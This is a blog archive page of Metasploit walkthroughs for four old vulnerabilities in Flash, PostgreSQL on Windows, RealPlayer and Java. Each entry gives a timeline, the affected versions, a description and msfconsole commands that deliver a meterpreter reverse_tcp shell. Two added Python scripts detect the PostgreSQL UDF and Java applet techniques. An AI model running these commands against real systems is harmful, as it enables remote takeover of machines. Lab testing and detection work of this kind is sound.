Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2011-0609 : Adobe Flash Player AVM Bytecode Verification Vulnerability

Timeline :

Vulnerability discovered being exploited in the wild
This vulnerability was used to attack RSA
First information about the 0day published on 2011-03-11
Security Advisory APSA11-01 posted by the vendor on 2011-03-14
First vulnerability analysis provided by villy on 2011-03-15
Metasploit PoC provided by bannedit on 2011-03-22

PoC provided by :

Unknown
bannedit

Reference(s) :

CVE-2011-0609
APSA11-01
OSVDB-71254

Affected version(s) :

Adobe Flash Player 10.2.152.33 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.18 and earlier for Chrome users
Adobe Flash Player 10.1.106.16 and earlier versions for Android
Adobe Reader and Acrobat X (10.0.1)
Earlier 10.x and 9.x versions of Reader and Acrobat for Windows and Macintosh

Tested on Windows XP SP3 with :

Internet Explorer 6.0.2900.5512
Adobe Flash Player 10.2.152.26

Description :

This module exploits a vulnerability in Adobe Flash Player. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT (Just-In-Time) code being executed. Specifically, this issue results in uninitialized memory being referenced and later executed. Taking advantage of this issue relies on heap spraying and controlling the uninitialized memory. Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several other browsers. DEP does catch the exploit and causes it to fail. Due to the nature of the uninitialized memory, it's fairly difficult to get around this restriction.

Commands :

use exploit/windows/browser/adobe_flashplayer_avm
set SRVHOST 192.168.178.21
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

(The exploit takes a long time to complete.)

sysinfo
getuid

PostgreSQL UDF for Microsoft Windows Metasploit Payload Execution

Timeline :

The vulnerability seems to have existed since 2007!
Vulnerability discovered and disclosed by Bernardo Damele on 2009-04-01
Metasploit PoC provided by todb on 2011-03-23

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All 32-bit PostgreSQL versions for Microsoft Windows up to and including 8.4.x.

Tested on Windows XP SP3 with :

PostgreSQL 8.4.7

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the UPDATE pg_largeobject method of binary injection. On default Microsoft Windows installations of PostgreSQL, the postgres service account may write to the Windows temp directory, and may source UDF DLLs from there as well. PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are valid targets for this module. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL and the OID.
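
As an added detection example (not part of the original post or of the Metasploit module), the following script scans PostgreSQL statement logs for the three stages the description above implies: a write to pg_largeobject, an export of that large object to a file, and the creation of a C-language UDF. The log lines are constructed samples with placeholder paths; the rule names are my own.

```python
import re

# Constructed sample of a PostgreSQL server log with log_statement = 'all'.
# The statements and the DLL path are illustrative, not a real capture.
SAMPLE_LOG = """\
LOG:  statement: SELECT version();
LOG:  statement: SELECT lo_create(31337);
LOG:  statement: UPDATE pg_largeobject SET data = decode('4d5a', 'hex') WHERE loid = 31337 AND pageno = 0;
LOG:  statement: SELECT lo_export(31337, 'C:\\Windows\\Temp\\udf.dll');
LOG:  statement: CREATE OR REPLACE FUNCTION pg_temp.f(cstring) RETURNS int AS 'C:\\Windows\\Temp\\udf.dll', 'entry' LANGUAGE 'C' STRICT;
LOG:  statement: UPDATE inventory SET qty = qty - 1 WHERE sku = 'A42';
"""

# (rule name, regex), in the order the technique unfolds:
# rewrite a large object, export it to disk, load it as a C UDF.
RULES = [
    ("pg_largeobject_write", re.compile(r"\bUPDATE\s+pg_largeobject\b", re.I)),
    ("lo_export_to_file", re.compile(r"\blo_export\s*\(", re.I)),
    ("c_language_udf", re.compile(
        r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+'?C'?\b", re.I)),
]
# Windows temp directory (what the description says the service account can write to) or /tmp.
TEMP_PATH = re.compile(r"\\temp\\|/tmp/", re.I)


def scan_postgres_log(text):
    """One finding per (line, rule) hit; 'temp_path' marks statements touching a temp dir."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = re.search(r"statement:\s*(.*)$", line)
        if not m:
            continue
        stmt = m.group(1)
        for name, rx in RULES:
            if rx.search(stmt):
                findings.append({"line": n, "rule": name,
                                 "temp_path": bool(TEMP_PATH.search(stmt)),
                                 "statement": stmt})
    return findings


def looks_like_udf_staging(findings):
    """True when all three stages appear; any single stage alone is worth a look too."""
    seen = {f["rule"] for f in findings}
    return {"pg_largeobject_write", "lo_export_to_file", "c_language_udf"} <= seen


if __name__ == "__main__":
    for f in scan_postgres_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['rule']} (temp path: {f['temp_path']})")
```

The same three stages also leave traces in pg_proc (a function with a C language and a probin under the temp directory) and in pg_largeobject itself, so a periodic query of those catalogs complements the log scan.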

Commands :

use exploit/windows/postgres/postgres_payload
set PASSWORD test
set RHOST 192.168.178.63
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

CVE-2010-3747 : RealNetworks RealPlayer CDDA URI Initialization Vulnerability

Timeline :

Vulnerability discovered by CHkr_D591
Vulnerability transmitted to ZDI by CHkr_D591
Vulnerability reported to the vendor by ZDI on 2009-11-24
Coordinated public release of advisory on 2010-10-15
Saint PoC provided on 2010-10-22
Metasploit PoC provided on 2011-03-17

PoC provided by :

bannedit
sinn3r

Reference(s) :

CVE-2010-3747
ZDI-10-210
OSVDB-68673
RealNetworks

Affected version(s) :

RealPlayer 11 to 11.1
RealPlayer SP 1.0 to 1.1.4

Tested on Windows XP SP3 with :

RealPlayer SP 1.1
IE 6.0.2900.5512

Description :

This module exploits an initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 – 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory is executed.

Commands :

use exploit/windows/browser/realplayer_cdda_uri
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit

Timeline :

Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI on 2010-09-28
Coordinated public release of advisory on 2011-02-15
Vulnerability details publicly released by Frederic Hoguin on 2011-03-11
Metasploit PoC provided on 2011-03-15

PoC provided by :

Frederic Hoguin
jduck

Reference(s) :

CVE-2010-4452
ZDI-11-084
OSVDB-71193
Oracle

Affected version(s) :

Oracle JRE 6 and JDK 6 Update 23 and earlier

Tested on Windows XP SP3 with :

Oracle JRE 6 Update 16

Description :

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with:

1. A “codebase” parameter that points at a trusted directory
2. A “code” parameter that is a URL that does not contain any dots

the applet will run outside of the sandbox.
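
As an added example for content inspection (not part of the original post or of the Metasploit module), this script pulls the code/codebase values out of applet tags, whether given as attributes or as nested param elements, and flags the combination described above: a code value that is an absolute URL with no dots, together with a file:// codebase. The HTML is constructed, the trusted directory is a placeholder, and the page does not say which directories the JRE treats as trusted.

```python
import re
from html.parser import HTMLParser

# Constructed HTML, not a capture: one benign applet, one carrying the two
# conditions described above. The codebase directory is a placeholder.
SAMPLE_HTML = """<html><body>
<applet code="Hello.class" codebase="/applets/" width="1" height="1"></applet>
<applet codebase="file:///TRUSTED-DIR-PLACEHOLDER/" width="1" height="1">
  <param name="code" value="http://intranet-host/Loader">
</applet>
</body></html>"""


class AppletCollector(HTMLParser):
    """Gathers code/codebase from <applet> attributes and nested <param>s."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "applet":
            self._cur = {k: a[k] for k in ("code", "codebase") if k in a}
            self.applets.append(self._cur)
        elif tag == "param" and self._cur is not None:
            name = a.get("name", "").lower()
            if name in ("code", "codebase"):
                self._cur[name] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet":
            self._cur = None


def is_dotless_url(value):
    """True for an absolute URL (has a scheme) that contains no '.' at all."""
    return bool(re.match(r"[a-z][a-z0-9+.-]*://", value, re.I)) and "." not in value


def find_suspicious_applets(html):
    """Applets whose 'code' is a dotless URL; 'local_codebase' marks a file:// codebase."""
    p = AppletCollector()
    p.feed(html)
    hits = []
    for a in p.applets:
        if is_dotless_url(a.get("code", "")):
            a["local_codebase"] = a.get("codebase", "").lower().startswith("file:")
            hits.append(a)
    return hits
```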

Commands :

use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid